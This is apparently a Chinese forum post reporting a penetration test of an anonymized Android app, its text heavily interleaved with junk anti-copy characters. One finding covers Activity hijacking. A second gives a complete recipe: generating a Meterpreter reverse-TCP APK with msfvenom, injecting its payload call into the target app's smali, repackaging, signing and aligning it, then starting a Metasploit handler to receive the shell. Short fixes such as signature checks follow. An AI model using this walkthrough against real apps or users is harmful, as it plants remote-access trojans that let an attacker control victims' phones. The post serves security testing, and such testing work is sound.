% @& r1 T$ T+ u% ]0 _- T" y* H7 _- l 9 ~, x( v( v4 T& A   6 E i$ L4 T5 h# B6 i T. m4 d) F: d: y. C. ^

5 K. |4 g3 u7 Q! b A# J o2 B( z6 K, a B

$ z0 ~1 h- L0 _( c: }- j! b: I) X. V H! I, N 1-2 测试结果 0 T9 Q( G# C0 ?9 o( ? 9 @' }. J4 \% S* z

& H! V. ~3 J, M% ]# ` 6 p$ A) E5 n6 Y; t1 S3 u

* B8 r' |' c1 T# C6 ^3 r3 w: i * @$ e' e4 p* @+ p h- F   # F1 w( Y4 q: U( Q6 l9 k; Z 8 H$ T @5 g8 Y$ Y

! u8 g1 p! e( k) ?! K3 k* A7 x ! t* \( T) z- W/ f) s1 \7 [

3 u9 M' w1 u3 N8 e$ |5 F: q5 ?- K+ g # \ p7 |5 T @9 M1 r 2 检测结果                    $ y! R! w/ t4 F4 Z; ?- ~; V# O% H, w/ C' [. p4 h

8 _: P0 {# i+ [) ` ( `+ M# s# k3 `+ s) D8 T

) J% @! Q4 ~, T; J/ `4 _3 t- n- b2 ~9 N. N6 r 2.1 某某某 $ l9 e' i X% a' u' { 8 u5 g7 W; L: g# e

3 h3 N" I: e! R5 o 1 A& F1 h" ^, H$ e0 L& f' Q6 K/ \

3 ~9 r! t' r& b; T) T% A ' D9 `! { T3 Y9 L$ V* g 2.1.1检测目标 - I7 p5 f+ Q$ P5 t % E6 G, N# G* s- c2 b

0 N d( k+ g4 G8 }: z: n$ m+ a! r5 `" W8 C3 B$ x, {4 \

. G; c; p0 G* i0 ^: U% V: n( h3 x4 G: z. }6 S 目标地址: 某某某某某某APP + g- R+ M- s/ ?1 f 5 ?/ }2 A8 A& Q# Q7 }6 S$ @" k8 W6 T

* E5 ~+ g0 d1 m1 j- |* {# f ( ^. f8 v5 b0 ]5 K# g

: l$ B3 ]% `$ o4 D3 _% R i( P7 k, f; a0 T3 b 2.1.2检测结果 & S* B8 D2 R% {0 f$ U 7 g2 e, A4 l' b( {. d1 q2 R

6 ?2 ^ H! r* ~% R/ q ) F1 ?& c p4 @2 u

: z2 {% }/ l; Y# C* {2 G ; B$ {: t% p, {. H1 r! D2 X) q( N 2.1.2.1 . r4 e% d6 k" ]* |2 M 2 Y$ w) B9 _, R/ m5 [2 X

& c U8 Z! w2 i) x' F L( }+ E 1 Z, B5 B- O4 Q* M/ \4 D4 C- G

. L; Y, k1 Q$ j# V7 O0 o. f# f5 n, N9 W1 S: B5 ` 漏洞链接地址:某某某某某某APP 4 G: E: G, D9 C/ a8 {5 [7 W- X6 c x" K5 ~/ N

; R% j3 m2 M9 V" x6 T( ~0 ~* `8 `/ [9 D, W/ c! s' N. ~6 a; w/ N

6 {8 g5 J y0 q+ N0 ^; @7 R ' [* |0 d/ o# B3 d   1 c, J2 |8 J. `. `1 o2 p6 j 8 y4 {; Y4 ]4 |4 q% \

& X# u& w1 I' q( y% @$ c. W) L' w8 B1 Q5 B- `$ j3 D

i* a5 I: B2 F! _1 j1 ]3 [8 k2 D6 P 漏洞分析及取证: 0 X: a/ Y& @2 V7 K9 H# }4 s; g

4 O# c. E, m1 r4 \2 I8 k! c" {8 d2 ~4 E; h( K7 ], ]

2 C# n: n( G4 m @& E7 k9 L' C: g# a2 z% y, E' a* s' O                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: : p' `2 C5 f1 q3 e! l8 D* |) |. N) ]

1 ^$ H8 V$ @1 ~" n. X+ b4 P: U" k) t- L8 j

9 c: ]0 D( k: v1 T3 q% R/ h ! M: N, z' W: Q+ H8 ^4 A+ @0 e4 x      " v. i# G2 ^0 l2 M: G# O# W 7 `( H& S, R* m' ?8 h+ I; k

* ^+ r+ t) d9 m# w( [+ x 2 C* l) o5 Q4 \/ P0 J b& C

3 D8 |/ T b! Y: W& X7 M5 ^, h' ~" T' Y4 t3 V                       & O: i# d/ o M- ]9 n7 ?, t 7 C" c; { ^ a8 |4 q5 x% Y

0 d' `4 }0 F& r* j: w1 g : g# V4 _# n2 o

9 o% j/ T/ j4 |/ Q/ g$ K0 m+ P% \/ C! y* {/ ?. [2 w0 |& u Z$ H# v8 G3 R4 H1 o# A7 z & m, i6 C9 x6 G0 n6 B; S1 ^

7 f9 `+ |, K7 N) ^: n4 V 8 {9 G% q/ d$ n

4 P6 J2 b6 |* U4 d& f6 f # t" K# B: }4 N6 p6 g o( j : w- H- v, Y. `) R8 x9 E1 W3 g8 V6 u# j2 g9 _& s. Z, H: k

' `, S' t) y$ V* q6 X; L3 | 1 ^( K2 _5 G3 X# D5 v

. F4 M4 ]5 m" e2 z* y: x & t- o! r# X0 \* E 1 q$ i" _! i! T+ E& `( N! c% ? 8 j8 l6 I( r. J& O" V

* {5 p1 o9 J. m( T; X ! g0 u1 Z, S F* m5 \- n& l

$ G( Q3 q o D) D' Y 2 @, H$ u8 w6 b 漏洞危害:高 # C0 Y# `5 C4 e* g . q) y! g* G4 o. F* W/ n1 z* a/ j- ]

9 G% J+ m; N" s; q3 d, E2 N ! I, z m' L$ _" W( Y
! l0 }/ q3 G) ] ) _+ g6 I; s- y. P. t" O' I % r3 o4 y4 z* L2 z2 w" u3 z4 r- t) X" f X- P# m* Q" ]" Y) |' U- l3 I' d2 P' U l2 V. E) e6 [+ ]; p7 k/ k7 M/ Z+ F! l* m* {- d/ e5 v6 p; J/ d! {5 X# K- c3 N6 K8 P* }' x# l: s9 t) e9 H; B7 @+ s6 o- {8 [$ s! w8 } Z3 j7 [* T: B3 w. ~- B/ j) Q7 @$ M0 |# z; g3 i' z$ t2 W! w# x, }2 c( r/ i7 L' v5 Q5 g, X j: e7 y# M% }, c. G9 U$ _0 h; {/ r3 D4 o: W" s& ~3 I/ O* b6 V$ X( B: s* }4 M+ p7 X7 k& O) E% _. }. p" _: P/ l. e- d0 y, Q' _8 X* i2 w" m$ \- Y L# g8 A6 ~- h( A1 n, o) m7 Q9 o$ f. N- C G+ v/ l7 F; v3 w5 Y. @8 _( z, A. H; u s7 f* L8 W$ U. \7 I0 Q
. g2 K% O/ c. X8 r ]; j. z / v# h/ m( H+ x; L

4 ?1 h: d+ C3 b$ F- G2 x9 h ; j0 u$ V! Z, I' m! w 严重程度 % ~4 c8 s* p2 m' H( F8 g4 E; e* D Z7 o! P4 D! m/ Z

3 ]1 b7 l- T6 w8 }- L+ j6 X. Q 8 s: d* A& w3 O- `
) a8 @" J3 y# X+ e4 S J " x5 v, j6 V I1 C

. s5 X* ]( e& R- Q9 z7 y9 O 5 O% ?+ L) z$ A& c4 j " h @9 t5 c3 \2 g ! i) R) U( D3 B/ o1 a

8 j: [7 W! V6 g" k& b8 Z) K+ Y" ? 2 R2 W- M* U$ V0 T- w
0 `& e' _8 R/ A6 A+ J; Z2 ` 3 K; ?/ }5 P- v) ~0 Z( K

7 g Z* `: Q4 t" t& U( \& j f : |, y& N5 }: u, @# c 4 P* {5 M* ^# b + F+ r% D0 ] o0 d' b i* `+ z

9 B; s' U' y7 g7 r# n- [ 6 u9 J/ C9 y0 ]+ P- g
5 E- k- U, E$ [) P( O9 a . g( Y- v0 _- t

$ G6 h: k3 j0 R: B' l. R* K* ~ ) |9 u# o! ?* j+ r7 {* K' p8 f ( i) F6 V! b; @; G 0 o* e% a2 P7 c+ ^8 {- V

6 R9 z8 Q5 ]$ I7 C& i 4 S# N) {- i) c
; p. P! _( q1 D / O* W! O) U- v! u

- h- L! E1 m/ c! n( S1 r( i, r" \ 2 v' e" H# w! Y   $ w4 m: u, X" b. v5 e8 ~$ s4 V+ h: n2 [' O6 U' O" E

6 k, b J% N5 U% T3 Q( B 0 J! G! C% j; N2 y' X. K. q
5 O, N4 G$ Z! b) W& f ; q) Z% }9 p8 O$ N2 W/ {

# A& r% c# o8 C* @ ( i1 }+ s) ~% c9 N l! ?9 ` 7 ~ _2 U& A2 S& c% U 1 X$ w7 p+ N4 H ?4 T9 r

( p* o; W* o* {6 k* J6 Y5 W* W E4 V2 E, Y" r; @
$ j4 l# C' ^6 h ( I3 N; c, U, I/ h( m

& c/ J% t/ B+ y4 W! h) A" y* I( t) { N' \; E" d6 D$ v$ i: s; j1 ?   " A' @$ h9 {: I; F f% V- B' T. M3 @

D; K7 Y1 `& |- H6 P6 n+ k! E+ Q. f1 n8 d
: O' c2 U6 ~& l$ B5 X- w# Q1 r $ N7 e& ?# ?: T! m. l" ^7 Z7 H
9 K9 g, f, X7 @. n X! }" S/ z. N" ^1 y3 o: ] [

" h5 ^: R0 v& |% }8 [1 X' I* O' ]0 q7 I( ~% l   d6 ^0 S7 T4 i ) K( F) V9 A4 f& ?

3 b1 D6 Y. u( ]2 A" u, Y . n) [. E3 B7 U$ N& Q4 A2 M

; Z( O5 |3 g- D+ H. k * r: |" `2 a) k/ k 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 9 ^4 L! r/ Q3 q% t) P# i; E& E3 Q# J+ T- p& F- `, L

+ Y4 ~1 Z x) X0 A9 q: ^) W# y) V& ]- e

' K9 [1 u+ `! }# F j3 `' j. s' V1 E: R3 u+ T           1 X$ |7 F+ Q. N' y6 V h" {. a/ Z& {% H( o

7 B2 o+ ]: A# A- O% B " c& s: b( `5 w b

: e$ E2 g# e9 `) T* F" R& [3 H 0 @1 V8 u. E7 H4 @; v   0 `# h$ [$ I8 Y6 z $ a3 {5 S" Y: C; S6 ?# r' Q

( _1 A7 F* }; _" V/ R ! e+ t' [$ P7 @+ U

1 n/ q& W7 P$ l) J& F: W + e. w' q9 d/ j2 S/ O 2.1.2.2 5 l% ]* p( \0 {# G9 b' Y 9 C" q" r+ B" s( B' m

3 B/ ?* D O1 i 3 Y/ R! J; h: {$ q0 O

2 a8 E( D4 }: G; M ?9 Q+ D' t9 f+ E4 G { 漏洞链接地址:某某某某某某APP 6 T1 n/ N2 f' X4 _6 d3 L6 d+ p( v ; d2 [1 w8 c& g8 t9 E" J' g+ G

) p7 m1 T4 a4 @. W3 k5 x0 s* E/ F s1 B4 b; p4 g }8 l d( x% z

* S6 h9 K( B. @5 f; z( x8 ] & m. c# D7 h* c, d* N 漏洞分析及取证: 7 g: Q$ A8 ~& O! @6 j2 [4 C 1 u# @' i) d. x- z, r) j. X

- j( L5 c9 ~8 R1 i- @1 @& r2 M - ^; l" V# Y; f- x$ H$ Q

- D Y: a% o4 y. v 2 m3 J5 m; O" R                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 2 ?6 J* ~4 v, n, ?& k! m% F5 T% B( w3 J5 a# G

' P1 b0 l' ^# }) m) V7 L+ W1 h0 C. T' H( v' ]5 m" n6 L! R

% _. N p. I0 @ P. U5 U' [2 x$ e* h5 B" R. Y Metasploit 生成木马 apk ! l- _% a: g* s1 F, [1 H % e$ s. x% {) ~8 j8 e

; p" q* [+ G. s+ U, p+ N2 a 8 g7 p- c4 T& m- q; s& B% A

- }2 x% t L: t! x9 v3 z) G: Z" B2 G( t6 } d msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ! s3 l# W, S" k3 Q' Y6 u3 Q % V8 A9 P2 f# h, k

5 Q2 p! p) m- ~+ ^- d% C [ t 1 M( D7 i! D8 u% y ^- k

! m& t. k! d: u3 @: W 3 _- N# }6 `1 N& V3 a 反编译目标apk和木马apk / `% ]% s4 \ J. A! I% y Y5 b' T- S V

- X( X& _0 V; r+ H( F. ^: n: c) d' [" D6 m& R

1 x% q6 G7 ?( k2 Y9 ]" C. G& t % Q/ m3 R3 H% F7 M! N apktool d target.apk
$ L6 E y& M& B; b, G) q* l0 w: o 7 S! [6 Y+ G5 c# O! }+ ]4 n9 D apktool d cockhorse.apk
+ d7 ?9 \8 X/ R/ k H2 A8 O 1 v( K& W n' t, P

8 T! j% F' i0 e1 ]/ d2 n9 k 8 |2 I$ K3 k0 ~4 G! O. `: Q

. S- @+ g8 X6 i4 r9 m6 [% M* I* ~2 e1 f 木马 apk 注入目标 apk / T! {9 w* V7 y3 ?/ I8 l- W h. ^( ?; h! k" j

) c* A4 }! `9 G/ Z : U/ i$ y3 [1 [; o5 X, c8 H& T

$ `& T$ }4 ]+ z- ]$ L3 g/ S. z ( h' v' J2 ~# X3 r! X 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
+ j. R3 D9 F6 F {( J % V, I# r* O/ v* N9 { B4 u3 w invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
7 f$ B- h: J( P G& x , M- |2 M! {2 ]0 D- _6 W$ q8 H' x

0 A5 k, d' N" O5 d2 G% |5 E; w. ^1 ^4 G& g1 \% c) A/ f6 |0 s0 b

. ~6 O! @7 x; i3 g3 p, x1 }: n% k1 ` E/ X- ?% H 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 - u3 W6 U! M5 t; |" i6 e" p+ Q: k' A' w$ ^+ k! M3 @

, t8 b* F0 h) J, f! N 8 `; ]# G/ U! d

- ^/ A4 ~: L( r% ^4 @ ( j# m* V0 d5 n. q4 E 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ . Q3 Y; _5 L( ?" h! Z9 u 7 y0 Y+ N& B7 ~6 G* C

' F! {; O w- }$ H : ?! Z" }$ |; h: M- Q+ X

* `* |/ g- w! M% T X/ Z + M6 \) O( m: Y7 s3 ` 回编译生成最终 apk + i2 k* \' H% q; [: L5 ]3 n 7 C/ a, w* [/ @) b" }

. s+ g" A5 l" a% v( T + ^, x* J. K. Y/ M& U- h5 U: |

# q) P( Q8 G& E% H+ x4 W s1 N; a. K' H1 l 重新打包 4 o+ u4 P- ?0 V3 Z6 {" W: s7 p . I6 q8 b9 l' ?# ` E

Q; r0 _- |! k0 i8 m) u! y3 z# d6 @) C

J& P6 J3 Y6 f" V) V7 ~' s3 j/ R" x- t" x& j: R$ _, ]$ `# k0 ` apktool b -o repackage.apk target_app_floder 1 p8 P8 T; G4 i5 {& ~ - Q9 d% s4 H1 X

% C# H+ ~4 ~% z% z' |- R9 t% h+ v5 i& l* r O0 U' w9 c

- O& o$ ]* ^! @$ [1 ?( h , h C# e( r5 y7 F; x 创建签名文件,有的话可忽略此步骤 $ O# Z! {% F4 s7 G2 v* x' d. x ! @2 b+ e# w: d: C9 O8 o

. I- q$ N! @ G' H' {0 O1 Z) }) K+ Q6 B r

7 A2 t3 ~& b0 w8 v% y; |" P ' b6 F+ n9 o7 { keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                0 S, u( ~! w* v" |' O0 ~1 o' J0 [0 V' x) K$ [: k3 ? x4 S1 i+ B( b

- E2 k* i: h! N. u; a3 u1 _$ p' C5 V' ^9 E5 e; f0 `' k. f& Z) r

% Y8 o8 O& z; D) m3 c 1 P$ l3 m) R% _ r* ~ 签名,以下任选其一 + l/ z& W5 X0 F" ~! _ v# n! t- N6 i/ l2 m q2 L8 ]3 }

: A: W* ~' F) d( X7 | 7 D2 N$ r, c: A+ i

6 V3 t' Q% ?8 @! p( d4 y & ?, k( G! ]- m b jarsigner 方式 - g; Z% ^+ ?9 d# g+ H A % h N9 _7 B- Q. r

0 \6 C" {# L- `1 f" G2 J* @7 ] 1 l2 q$ F; Q" P, ?& j8 L& {

6 g/ R0 @ i2 A + }3 P ? Y7 a& C# Y" h+ [& ] jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 o d: x) A6 ^7 s2 q % @3 ^; V# J' s; i8 U+ P

5 a9 z% m0 U/ _ V) q2 f5 O5 g( d: y8 ~: s O9 w

) M- C" |3 u5 I C2 [8 ^' W/ n% u3 q apksigner 方式 - y& R! {5 W7 s% d: w 1 H1 X% z g' {# j8 @, {- B

& ?7 S3 _% x; `% L# B $ o1 A/ @5 ^6 s3 Y4 D) z

0 X* o8 @8 C1 H& H) c - g+ K6 e4 `8 Q4 H* {+ [3 z apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 7 Z3 n/ |- u6 P9 d8 g+ d7 [. m5 R 3 r9 ^' A6 [6 W" h6 t

3 S; ~ u" t* h7 Y _. A, m+ O3 j! U7 N+ E% h

( z# w2 ^& x# ^0 q $ N- W l, p! b b8 X5 E 如需要禁用 v2签名 添加选项--v2-signing-enabled false # B# R" g" ?3 N' B$ ]7 b * h \* e% Q0 ^0 s$ l) P0 @

/ J( k5 u+ X9 F3 }1 P* O 0 D4 X8 E# q/ f, o, F4 t2 k

, @5 C- M8 }8 p0 ] ; `& J, M& A# K' F4 G 验证,以下任选其一 : D' }) p; y; R7 ?; m8 j3 U! t 8 I$ ]/ J g, f3 n8 V: I

& f. B8 F/ F/ b. H$ U5 y6 g : I0 f6 \; f# V) j0 P

0 e+ I0 C, y1 N 1 g6 }# U+ g/ [ jarsigner方式 9 G% g: X% m. g$ F , Q2 @& d) m* O( O( \: z

/ B/ n" `3 g0 ~8 }3 Y; `. e . j$ i* ]0 ~9 [7 U

7 L: t9 k+ S; d 9 ?# A4 D2 m- e B. o, h) A jarsigner -verify repackaged.apk 9 j) Z) K& |* z/ ]& `3 \/ Q6 r + F9 S: ^! ^* C

. r, j$ d: F# B1 v @: k( z* C/ l1 A

2 J8 ~( f% b! O3 b6 y2 E ! m8 ^( h5 @1 n. j. ^! c apksigner 方式 ( Z, |4 l5 l, p$ Y( ~) k# a6 s% o& ~$ g

/ R8 g" g' U: G* j4 c0 m/ y " W" N* Q9 t. O ?3 y$ G0 w' N# R, t

$ Z% F; N( a- K2 n: Z1 R* ? 1 i ^0 m. V( ]7 a( o" k apksigner verify -v --print-certs repackaged.apk ) }9 o- B# E% n& i " r/ c' Z; Q/ ^# y% a0 ?

" Q0 k, B4 D( L ! |" B: i/ ?; u4 u( G3 s0 i3 |* f/ J

2 U# G/ ]( `5 w) m9 y& ~ 8 ?$ w& b" _- F2 h7 R' E5 Y6 ] keytool方式 ) q- k: \7 c7 q7 d3 h. }" u 6 J a. B" z3 H

' P, B' G, e, [! V1 a! w8 r: U k( y5 @0 V2 e

! p# q$ o' u8 z& ~ + @ L! ]- O) K keytool -printcert -jarfile repackaged.apk , Y& k& o: O# a5 r7 Y 2 l3 ~/ }+ Y0 N" j

/ h" R; G( b: B4 T9 s$ d, ? o" h; E8 z6 U0 X$ P: l

' C3 j( y% @- d P; o + x1 {+ B) @7 j# G+ U0 S4 W 对齐 + B% B; z4 T# [. Q - k+ _6 o7 s- m$ c- \7 P6 i& ^

- g9 D3 r o$ P; Q5 U5 n9 k5 ?1 B9 W& x0 w4 A; R+ F

: C k! `& d) H( h. h/ L; q: v1 G9 @6 p0 t1 i `9 E" E: v$ k( y 字节对齐优化 # D; ]; V0 o& o& v: ^7 x , C) P+ \# Q( D& m

, u' C, V+ y) W: T6 o 5 t# @4 Q# u8 ]1 y5 ~

) `- H* ^- @1 B- l2 x1 |! @1 D+ X) w7 R zipalign -v 4 repackaged.apk final.apk 8 [& I# x X5 a$ i 2 z- B; J# S: Y+ a# p6 J

9 @' ?& Y8 }) o+ w6 M $ ~$ k3 ]- W/ B

, Q$ m5 K, h9 e* x! F& W# ^' j/ I 7 ?2 J& X# r% @5 _& C. O 检查是否对齐 , z" d* V O- D+ T7 M' ?6 J W. }$ N. n& R0 ^& y3 d

9 k9 T+ {1 }& M9 `+ w9 v( @ 4 n+ f3 g7 v# Y2 G$ g8 R

) Z. ]5 }1 A2 e; Z1 D+ H 3 H2 u- f z+ S+ _7 j0 W( j, h zipalign -c -v 4 final.apk 0 R! ^1 [0 n8 M, G2 ^8 |$ K # S/ K2 F1 h% J$ x+ O1 L z( j

6 E/ z7 C0 W, {1 Y5 \( N" c4 _& A1 b

( U$ a- z5 @* x# S9 q9 G ?# s% T/ |5 J e# z# V0 z+ Q 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 1 X1 I# b' _: `5 p1 |7 I : S& J# r. |0 |- o$ q M

1 h% x; Q' d$ q8 k 9 N. l8 n5 a6 B X6 z7 p% G

# l" b+ @4 g T* s5 S, m* l5 d0 c" F1 f$ d% X+ D( | 启动Metasploit控制台,配置参数等待上线 # a8 Q9 N0 _$ j; O/ ]+ x2 B , c+ V; z% L2 P/ q; ^0 t$ u

7 R" B8 ^% ?) B8 p: Y8 j4 ] z8 H2 }; W# v. L# `6 J7 n

7 ?7 k& N4 B- h w) X+ z 9 Y0 [& N# r' h( Y8 c0 z) @0 Y 在终端依次输入如下命令 + j1 N# e+ Q* t. y $ _7 E! F/ Z! \# D

) `; o* l( e% l2 _( H3 s7 v6 s& y5 S0 m4 i- @6 G5 u

4 L0 w0 H* S; L% Q ! \; R# K5 q# d0 S. F7 T msfconsole ( R3 x4 W! Q; R7 Y % z# I8 f4 G3 C4 e, p3 X; ^) Y# p

) e6 a# p- L5 b9 w' R ` ( B+ e/ ^9 ^6 p0 O8 D& `. q- x& f9 U

& s- g; W1 c, { $ c; V7 k5 h; p' Z* e9 p use exploit/multi/handler 5 z3 y9 O: K. j/ T4 o: v * B0 u/ H8 W4 r4 `$ p

, o2 H/ k6 b% ~! ^, l 0 L* m1 v0 c5 p0 w0 O

. x/ Q5 q$ Y1 \5 U8 P0 o4 ]% t0 {: X) J' q set PAYLOAD android/meterpreter/reverse_tcp # A6 K' R8 n. t7 I9 t7 @3 J7 h' r

5 `1 \( a6 n% l% }6 l# \ / @+ U, p h. ^3 \

; f+ M8 w' J% U. Z% v; } 4 B% K* W3 C% L9 P( D3 s) ] set LHOST 192.xxx.xx.xx * s0 ~0 _' Y. z2 m( f/ S5 Y+ y3 m! v( A+ S$ F

7 z; D# d% f* `" ` ) M2 s0 D; A* ?! ?

- s& o( J( b' o ; q1 i" j- n h' g( }* @ I set LPORT 4444 " r( J5 U3 b* Q/ j6 n1 p $ u- L9 U* M4 |- j. v

# H9 P/ M {( ~4 X8 U, y# E# r % |/ h! N+ F, ?" {8 [& }# O

i! h |+ n4 m7 S/ d# I 6 v: L6 `, t" h$ X1 h. o& ` exploit 5 p& Z# O: i, D% X! G; r " b( U& B5 p9 W, D6 G% N

/ }9 i" M/ \+ x5 L; K! Q G4 d# f% q" U6 ?& ?

( q) d6 ~+ H. }! }- M, J4 } " b7 z0 D! Y1 x7 G- j0 i 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               . K B2 j+ Y* _9 B6 G+ y |/ }: a) [/ z, O$ e

5 z' B" N8 b5 j6 R# w0 j 6 d) d6 B- L' r

3 K% D& }6 E7 [, w2 J Z; w - Y. A- u9 N# j 漏洞危害:中 4 t; ]) G+ c( U' g & Q# H, b/ q- w! M" ?. H( [

( Y4 S6 N1 h! W, }+ l4 b+ I5 N( e# V
- I8 j9 h! c8 M6 e4 b# Q' K $ A6 e! g; Q8 ] 3 b6 I3 ]$ x5 V* k3 ^ 7 e: {" A* B3 D; I5 | 6 O. p$ [8 x+ y z7 ^9 Y* ^# e6 b8 g* \- s% u ]) t2 q! ~ ?- o8 S% M5 G& B [; }& K8 S5 W' Q, E* r+ `. d. I T# `5 i# q2 _6 j1 ]$ O8 G! ^7 z6 j9 B8 k1 N- L6 D. v8 M. q' [7 S4 }" Y3 i E: d- H& L8 ]0 K& s) |" q! \1 ^3 g/ T. a& M& A- X+ w, N& r4 L% `9 K2 Q) `7 ]8 Q* C* e1 g; L- ]* H5 |& W; L" D) e) z: k9 ~: w; @$ @4 m& l3 t! S" W' ]' a. A1 k" _2 o' @5 E. Q: J/ C2 O# c0 n1 Y. s$ U4 I* `2 t5 a" j z3 i# b# S& Q$ o% T$ M: \ I8 }; b6 T2 H4 a$ Z$ K- [9 N$ i: ?$ Y+ @8 ^ o& r; N1 m$ z: N' e! x- x4 a- S% e& B! S- {) d, O: y l+ ^7 M; i: M# ]& z; z' _. S' W0 R8 i, G0 a+ Z+ I: N/ d* |2 F1 @
& c* n3 O# d% K0 d0 U% \8 g) O. d$ m R) z! ?

7 e) n/ q/ J, F, m * v6 g8 l8 e1 @2 d/ T% u _8 { 严重程度 9 X K/ `4 \5 g) c- E$ V5 {8 u1 ] 4 [2 s( K( i* l- Y9 h( a

2 @& K5 t' l/ X% m ( R* j; b6 u1 j
$ q" \7 p# ^3 f7 ]- ^. w/ Q9 P2 `. m2 E: y% v! k( G, ?+ `% b

4 }, y _! s& k& U% e2 o8 |( G: ]( }! f* F# B z ! ]1 \: i3 S6 Q* B ) B4 j! S0 y. u4 B/ I7 t* p

+ | T @' ]# U8 E$ k: K$ x ?, U; ]6 t" G" Z q5 B7 Z# P8 [
( s% X) |9 j* ]; m$ ~$ K' ^! R ) a8 X' w3 C6 _

$ s' E$ R# C- O& Z P) s 5 K/ F* U$ N; Y7 n8 o. a1 n . t5 a9 ^- B+ w% i% d$ [8 _- K# D, n8 A" |9 P" h; W3 B

5 H; @6 P) u1 Y3 t 8 |7 [+ [; ?7 Z) H
# A+ Z+ D- j$ F4 Y: X/ _5 G 3 N. z8 z: {8 C6 j' `0 L

; f# V+ w. K6 n3 o, E: h* D1 Q " R+ Z, Z5 D6 G7 Y! V+ t 1 D6 X8 ?9 J: N- Q3 Q 4 T5 u& D2 w7 j4 a" Y) B

1 G8 B# P9 [, {3 j4 K' F 7 K: i; }' [4 Z/ V, ?% G
' d7 d6 p6 F3 i# X8 O5 K0 |# L% ?0 G " q4 \6 P$ W# v0 m $ R C+ Z! s" ]4 c

" r# P. [3 W! Y# c$ C) o. m! m( B- T+ W! |   9 ]8 D" T$ b7 y, s! @+ O + t, ^: `9 Y9 j

( W1 t# X. h. ]# b$ l: O. I T% | ; z: U% F. G7 A; f
# Q6 [, z# `, `* k ( j. s! { g8 P; |9 D, g. h8 N" q% H

% E# @- `8 h5 Q9 k9 A$ f, Z; }3 r % Q' D% r0 L( `- J 6 d1 z6 n6 }" A- g0 Z4 I, {9 L9 ?& s5 O# F

4 y- H$ d( t. Q 7 R& o+ `5 q: r/ e- I
b# O6 m2 U$ s3 w8 R2 X, W U ; I9 B/ F+ Q1 X% l/ t& f & [# I4 ?7 i, s7 Z1 ~+ Q# x . k# E. v# K3 @- x9 w

1 J/ i" s. n( }' T 4 l6 M2 w; M! I' f& f   3 B+ I: b; O9 q& |( @9 R: a 8 G+ U4 M9 }- K+ _% l# G

% N1 \. V$ T1 r7 l0 M- M. a1 D! A% F, g 7 I$ B0 l$ I7 {
$ d6 P$ R9 N- k$ V6 B- M3 p ' j6 x# p3 q0 G2 c. x
) q7 @7 n. C: Z9 d/ ]6 E 3 u; C4 O: N/ B$ x) }! o; Q [% B* F

- t# t9 z+ m. E7 N/ Q3 s ' {) {$ a: y2 j# Y7 `; j   ; C, ^9 r y- q' O/ A" B 2 @% Z+ M" Y# y/ R C7 h

" s* [& Y5 @. Y7 M ( R e' c: ]! y5 B2 d6 l

+ M6 [0 y! M: D- a/ H2 L" C6 S& p) Y+ |) o 修复方法: ! Q/ X: R/ T6 N# w- _9 x* G9 k3 e' @

& P+ _ z8 E, w) R4 J( ?/ W) F: Y9 ?6 @) j

8 Q- P& i. R# Y4 v4 m $ g4 y8 l9 |1 f) D9 r1 {               1. APP 启动时应做签名校验防止二次打包。
, H( L& g5 E; i* f+ u, g 9 |% |+ p) }! O 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 % N J9 n! e3 \4 L' [! x3 L; b ! r/ ]& W; U$ ?% I2 o \) P

8 p/ B1 \" q2 J1 q# S7 D% h+ ^5 ?) \" Q8 u 0 @) u4 ? \3 J. m: y& `* r( f6 b- |4 m

/ i& M/ o. Z) ?# z" \ : |7 `, Q4 M7 e" ~! I$ s8 E   ) Y& c* p6 L( O z $ {# U4 A4 H/ G& c# k) e+ E9 ]& j

2 H2 G7 v- u6 u3 g 5 ^3 ], a# q. f/ c% K. r , {! o% r1 Z0 V* V6 Y 3 u3 \3 [* S. S! T$ J

' A6 b' i! w) ~1 K$ q& s& W! H9 T$ a% K4 y6 Y v
4 x; ?# i2 G8 c1 a _" q8 G ' u; _' S- [3 y& D1 v" r9 {

- C2 a, L9 G: Y: A 4 Z+ l2 a* t D. W4 P- k" w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表